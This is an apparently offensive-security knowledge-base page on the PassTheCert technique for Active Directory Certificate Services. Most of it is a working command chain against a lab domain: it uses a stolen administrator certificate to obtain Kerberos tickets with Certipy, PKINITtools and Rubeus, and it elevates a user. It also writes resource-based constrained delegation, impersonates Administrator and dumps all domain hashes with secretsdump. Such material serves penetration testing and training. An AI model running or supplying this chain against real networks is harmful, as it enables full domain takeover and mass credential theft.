Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / ADCS / Techniques

PassTheCert

Once we obtain a certificate and private key, we can authenticate through Kerberos PKINIT or through Schannel-backed LDAP. PKINIT gives us a TGT. PassTheCert gives us LDAP actions through TLS client certificate authentication.

Authenticate with Certipy

certipy auth -pfx administrator.pfx -domain ootw.local -dc-ip 10.10.10.200
export KRB5CCNAME=administrator.ccache
klist

Convert PFX to PEM

openssl pkcs12 -in administrator.pfx -clcerts -nokeys -out administrator.crt
openssl pkcs12 -in administrator.pfx -nocerts -out administrator.key

PKINITtools with PEM

gettgtpkinit.py -cert-pem administrator.crt -key-pem administrator.key -dc-ip 10.10.10.200 ootw.local/administrator administrator.ccache
export KRB5CCNAME=administrator.ccache
klist

Request service ticket

gettgs.py -dc-ip 10.10.10.200 -spn cifs/dc01.ootw.local administrator.ccache administrator_cifs.ccache
export KRB5CCNAME=administrator_cifs.ccache
smbclient -k //dc01.ootw.local/C$

Rubeus with PFX

Rubeus.exe asktgt /user:Administrator /domain:ootw.local /certificate:administrator.pfx /ptt
klist

PassTheCert elevate user

python3 passthecert.py -action modify_user -crt administrator.crt -key administrator.key -target student -elevate -domain ootw.local -dc-host dc01.ootw.local

PassTheCert write RBCD

python3 passthecert.py -dc-ip 10.10.10.200 -crt administrator.crt -key administrator.key -domain ootw.local -port 636 -action write_rbcd -delegate-to 'DC01$' -delegate-from 'ATTACKER01$'

Abuse RBCD after PassTheCert

getST.py -spn 'cifs/dc01.ootw.local' -impersonate Administrator -dc-ip 10.10.10.200 'ootw.local/ATTACKER01$:Password123!'
export KRB5CCNAME=Administrator.ccache
secretsdump.py -k -no-pass ootw.local/Administrator@dc01.ootw.local -dc-ip 10.10.10.200 -just-dc

Troubleshooting

PFX must include the private key.
DC must trust the issuing CA for PKINIT.
Certificate must map to the intended account.
Clock skew breaks Kerberos.
Use LDAPS port 636 for Schannel LDAP operations.
If PKINIT fails, try Schannel with PassTheCert.